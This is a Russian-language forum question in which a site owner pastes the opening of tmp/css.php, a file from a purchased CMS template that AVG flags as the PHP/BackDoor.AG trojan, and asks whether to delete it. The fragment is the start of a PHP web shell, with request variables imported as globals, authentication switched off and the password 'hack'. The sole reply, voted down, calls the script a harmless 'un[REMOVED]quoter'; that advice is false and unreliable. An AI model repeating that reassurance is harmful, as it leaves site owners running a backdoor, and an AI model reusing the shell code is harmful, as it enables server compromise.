сценарий троянского коня? на моем сервере

Я недавно купил шаблон для системы cms онлайн и попросил разработчиков установить его для меня, это был не дешевый шаблон, поэтому я был немного удивлен, что когда я делал резервные копии своих файлов (через filezilla на мой компьютер) Мой антивирус AVG вызвал обнаружение файла PHP / BackDoor.AG троянского коня в качестве угрозы, и этот файл происходит из tmp / css.php в файлах, которые были загружены на мой сервер.

Сценарий выглядит так:

    error_reporting(7);
@set_magic_quotes_runtime(0);ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
} $$_key = $_value;
}}}/*===================== ³Ìà òÅäÖà =====================*/

$admin = array();
// ÊÇ·ñà èÒªÃÜÂëÑéÖ¤, true �ªà èÒªÑéÖ¤, false �ªÖ±½Ó½øÈë.à ÂÃæÑ¡à îÔò��à § $admin['check'] = false;
// Èç¹ûà èÒªÃÜÂëÑéÖ¤,Çëà �¸ÄµÇ½ÃÜÂë $admin['pass']  = 'hack';

Я понятия не имею, что это значит, есть больше кода, если кто-то хочет посмотреть, я могу опубликовать ссылку на все это. Мне просто нужно знать, стоит ли удалять его из моего веб-хостинга.

Любая помощь с этим, я буду всегда благодарен! Спасибо

0

Решение

Код — это просто очень уродливый скрипт «un-magic-quoter». комментарии выглядят так, как будто их перепутали из-за плохой кодировки Unicode, возможно, не раз.

В противном случае сценарий кажется мне безвредным.

-1

Другие решения

Других решений пока нет …

По вопросам рекламы [email protected]